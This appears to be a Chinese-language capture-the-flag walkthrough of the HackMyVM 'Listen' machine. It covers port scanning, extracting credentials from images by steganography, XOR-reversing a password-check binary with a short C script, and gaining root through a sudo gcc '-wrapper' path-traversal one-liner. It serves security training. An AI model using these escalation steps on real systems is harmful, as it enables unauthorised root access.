HackMyVM-Listen 1 1 1-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.182  08:00:27:1c:a7:f6       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e4:ae:23       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.066 seconds (123.91 hosts/sec). 4 responded
❯ export ip=192.168.60.182
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.182:22
Open 192.168.60.182:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 14:34 CST
Initiating ARP Ping Scan at 14:34
Scanning 192.168.60.182 [1 port]
Completed ARP Ping Scan at 14:34, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:34
Completed Parallel DNS resolution of 1 host. at 14:34, 16.50s elapsed
DNS resolution of 1 IPs took 16.50s. Mode: Async [#: 3, OK: 0, NX: 0, DR: 1, SF: 0, TR: 6, CN: 0]
Initiating SYN Stealth Scan at 14:34
Scanning 192.168.60.182 [2 ports]
Discovered open port 80/tcp on 192.168.60.182
Discovered open port 22/tcp on 192.168.60.182
Completed SYN Stealth Scan at 14:34, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.182
Host is up, received arp-response (0.00055s latency).
Scanned at 2025-02-13 14:34:21 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:1C:A7:F6 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.85 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80端口看一下是什么类型的站点

看来是默认的nginx页面

但是为啥标题是apache2❓

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.182
Status    : 200 OK
Title     : Apache2 Ubuntu Default Page: It works
IP        : 192.168.60.182
Country   : RESERVED, ZZ

Summary   : HTTPServer[nginx/1.14.2], nginx[1.14.2]

Detected Plugins:
[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : nginx/1.14.2 (from server string)

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance
        HTTP server and reverse proxy, as well as an IMAP/POP3
        proxy server.

        Version      : 1.14.2
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.14.2
        Date: Thu, 13 Feb 2025 06:34:42 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Content-Encoding: gzip

扫一下目录，加个限制长度

然而并没有任何收获

当我去访问robots.txt时发现还是会跳转到这个默认页面

并不会显示404报错或者其他的返回，比如没有这个网页的话就会报404

我随便打一串路径访问也是会跳转到默认页面

我curl一下，无论你输入什么到会返回200ok

但是我发现了藏在结尾的一行注释

❯ curl -iv "http://$ip/1fhaskfhla"
*   Trying 192.168.60.182:80...
* Connected to 192.168.60.182 (192.168.60.182) port 80
* using HTTP/1.x
> GET /1fhaskfhla HTTP/1.1
> Host: 192.168.60.182
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: nginx/1.14.2
Server: nginx/1.14.2
< Date: Thu, 13 Feb 2025 06:44:02 GMT
Date: Thu, 13 Feb 2025 06:44:02 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Connection: keep-alive
Connection: keep-alive
<

……………………省略……………………

    </p>
    </div>
  </body>
</html>
<!-- Some people always don't understand the format of photos. -->
<!--有些人总是无法理解照片的格式。-->
* Connection #0 to host 192.168.60.182 left intact

给了个提示，让我们从图片格式下手

到这就卡住了，没什么有用的信息

我在想为什么无论请求什么路径都会跳转到index.php

猜测可能编辑了.htaccess或者是apache的配置文件

我curl一下.htaccess发现403报错了，没有权限

❯ curl -iv "http://$ip/.htaccess"
*   Trying 192.168.60.182:80...
* Connected to 192.168.60.182 (192.168.60.182) port 80
* using HTTP/1.x
> GET /.htaccess HTTP/1.1
> Host: 192.168.60.182
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
< Server: nginx/1.14.2
Server: nginx/1.14.2
< Date: Thu, 13 Feb 2025 07:40:04 GMT
Date: Thu, 13 Feb 2025 07:40:04 GMT
< Content-Type: text/html
Content-Type: text/html
< Content-Length: 169
Content-Length: 169
< Connection: keep-alive
Connection: keep-alive
<

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>
* Connection #0 to host 192.168.60.182 left intact

群里给了个提示，需要找到一张猫的图片，没招了

搁置吧

---

发现图片文件名在源代码的中间部分😅

这我属实是没找到，我只关注了结尾的注释提示，中间的一般都是apache自带的文档注释

找到猫了，哈哈哈群头像🤣

图片隐写

不用想就是图片隐写了

但是jpg和png各有一张，对于隐写之类的两者都有

CTF中常见的就是藏个文件之类的操作

wget一下两张图片

❯ wget http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.jpg
--2025-02-15 22:22:37--  http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.jpg
Connecting to 192.168.60.182:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 190696 (186K) [image/jpeg]
Saving to: ‘117db0148dc179a2c2245c5a30e63ab0.jpg’

117db0148dc179a2c2245c5a30e63ab0.jpg  100%[=======================================================================>] 186.23K  --.-KB/s    in 0.01s

2025-02-15 22:22:37 (18.6 MB/s) - ‘117db0148dc179a2c2245c5a30e63ab0.jpg’ saved [190696/190696]
❯ wget http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.png
--2025-02-15 22:24:10--  http://192.168.60.182/117db0148dc179a2c2245c5a30e63ab0.png
Connecting to 192.168.60.182:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 379011 (370K) [image/png]
Saving to: ‘117db0148dc179a2c2245c5a30e63ab0.png’

117db0148dc179a2c2245c5a30e63ab0.png  100%[=======================================================================>] 370.13K  --.-KB/s    in 0.02s

2025-02-15 22:24:10 (19.3 MB/s) - ‘117db0148dc179a2c2245c5a30e63ab0.png’ saved [379011/379011]

❯ zsteg 117db0148dc179a2c2245c5a30e63ab0.jpg

❯ ls -hal 117db0148dc179a2c2245c5a30e63ab0*
-rw-r--r-- 1 Pepster Pepster 187K Feb 13 01:33 117db0148dc179a2c2245c5a30e63ab0.jpg
-rw-r--r-- 1 Pepster Pepster 371K Feb 12 23:55 117db0148dc179a2c2245c5a30e63ab0.png

利用zsteg一把梭

得到疑似密码的字符串morainelake

❯ zsteg 117db0148dc179a2c2245c5a30e63ab0.png
imagedata           .. text: "\n\n\n\t\t\t\n\n\n"
b1,rgb,lsb,xy       .. text: "morainelake"
b1,bgr,msb,xy       .. file: OpenPGP Public Key
b2,r,lsb,xy         .. text: "UUUUUUUU@"
b2,g,lsb,xy         .. text: "E@UAUUUUUUUUj"
b2,g,msb,xy         .. text: "UUUZs-VUU"
b2,b,lsb,xy         .. text: "EUUUUUUUUV"
b2,b,msb,xy         .. text: "_UUUoUUe"
b3,b,msb,xy         .. file: MPEG ADTS, layer I, v2,  96 kbps, Stereo
b3,rgb,lsb,xy       .. file: PGP Secret Sub-key -
b4,r,lsb,xy         .. text: "DEUTfgww"
b4,r,msb,xy         .. text: "M,\"\"\"\"\"\""
b4,g,lsb,xy         .. text: ["\"" repeated 10 times]
b4,g,msb,xy         .. text: "HDDDDDDDDDDH"
b4,b,lsb,xy         .. text: "3\"##2\"\"#33333333333333334DDDDDDDDDD4C333\"\"\""
b4,b,msb,xy         .. text: ",\"\"\"\"\"\"\"\"\"\","

既然png中隐藏信息找到了，那jpg必然也有一个

利用上面的密码得到一个secret.zip压缩包

❯ steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg
Enter passphrase:
wrote extracted data to "secret.zip".

解压一下得到ssh登录凭证

❯ x secret.zip
extract: extracting to secret
Archive:  /home/Pepster/temp/secret.zip
   creating: secret/
[/home/Pepster/temp/secret.zip] secret/secret.txt password:
 extracting: secret/secret.txt
❯ cat secret/secret.txt
morainelake:660930334

用户提权

❯ ssh [email protected]
The authenticity of host '192.168.60.182 (192.168.60.182)' can't be established.
ED25519 key fingerprint is SHA256:wjUcj6T6r6sq8a/m+aBJnDgmy0hOeMWF04F18Qfae3Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.182' (ED25519) to the list of known hosts.
Welcome to the target machine, enjoy the target machine, hope you have fun
[email protected]'s password:
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 12 12:30:24 2025 from 192.168.56.110
$ bash
morainelake@listen:~$

到这里就已经拿到user了

在opt目录下有个提示，顺便打个广告哈哈哈🤣

morainelake@listen:~$ cd /opt/
morainelake@listen:/opt$ ls -al
total 32
drwxr-xr-x  2 root root  4096 Feb 12 12:13 .
drwxr-xr-x 18 root root  4096 Jan  7 21:50 ..
-rw-r--r--  1 root root   380 Feb 15 09:30 note.txt
-rwxr-xr-x  1 root root 17088 Feb 12 12:09 reverse
morainelake@listen:/opt$ cat note.txt
Congratulation,you make it.
If you want to learn network security technology,
you can join our exchange group
QQ 660930334
if you know what is QQ.
"Don't worry about failures; worry about the chances you miss when you don't even try. After all, it's better to look back and say, 'I can't believe I did that,' than to look back and say, 'What if?' (You'll probably fail anyway.)"

reverse逆向

还有一个可执行程序，IDA Pro逆向一下

得到伪C代码

简单看一下逻辑

按H进入懦夫模式，哈哈哈😅

在hint中，提示我们反转XOR或者替换

从伪代码中可以得知V19是异或值77转为ASCII为M

第一次输入是对比v18，v18与v6异或得知密码是ll104567

后面依次进行分别得到bamuwe eviden还有一个v16是与v7异或M得到的

但v7是数字不能直接异或，需要转为字符数组，再次进行异或得知ta0

利用GPT给出的脚本

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// 将整数转换为字符数组的函数
void int_to_char_array(unsigned int num, char *str) {
    // 提取每个字节并存储在字符数组中
    str[0] = num & 0xFF;        // 提取最低字节
    str[1] = (num >> 8) & 0xFF; // 提取次低字节
    str[2] = (num >> 16) & 0xFF; // 提取次高字节
    str[3] = (num >> 24) & 0xFF; // 提取最高字节
    str[4] = '\0';  // 添加字符串结束符
}

// 对字符数组应用 XOR 解密操作
void xor_decrypt(char *str, char xor_value) {
    for (int i = 0; i < strlen(str); ++i) {
        str[i] = str[i] ^ xor_value;  // 对每个字符应用 XOR 操作
    }
}

int main() {
    unsigned int num = 8203321;  // 这是给定的数字
    char xor_value = 'M';         // 异或值，字符 'M' 的 ASCII 值为 77

    // 创建字符数组来存储转换后的字符
    char str[5];  // 需要 4 个字符 + 1 个 '\0' 作为结束符

    // 将整数转换为字符数组
    int_to_char_array(num, str);

    // 输出转换后的字符数组
    printf("Converted character array: \"%s\"\n", str);

    // 对字符数组应用 XOR 解密操作
    xor_decrypt(str, xor_value);

    // 输出解密后的字符数组
    printf("Decrypted character array after XOR with '%c': \"%s\"\n", xor_value, str);

    return 0;
}

编译一下

❯ gcc a.c
❯ ./a.out
Converted character array: "9,}"
Decrypted character array after XOR with 'M': "ta0"

得到密码后验证一下

morainelake@listen:/opt$ ./reverse
Enter passwords or Enter H coward mode:
ll104567
bamuwe
ta0
eviden
[+] Enter the password successfully! you know: flower

哈哈flower是个彩蛋

Root提权

利用上面正确的密码顺序切换一下用户

morainelake@listen:/opt$ su welcome
Password:
$ bash
welcome@listen:/opt$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL : ALL) NOPASSWD: /usr/bin/gcc -wrapper /opt/*

发现拥有gcc的sudo权限

这里*给了操作空间

成功拿到root shell了

welcome@listen:/opt$ sudo  /usr/bin/gcc -wrapper /opt/../bin/sh,-s .
# id
uid=0(root) gid=0(root) groups=0(root)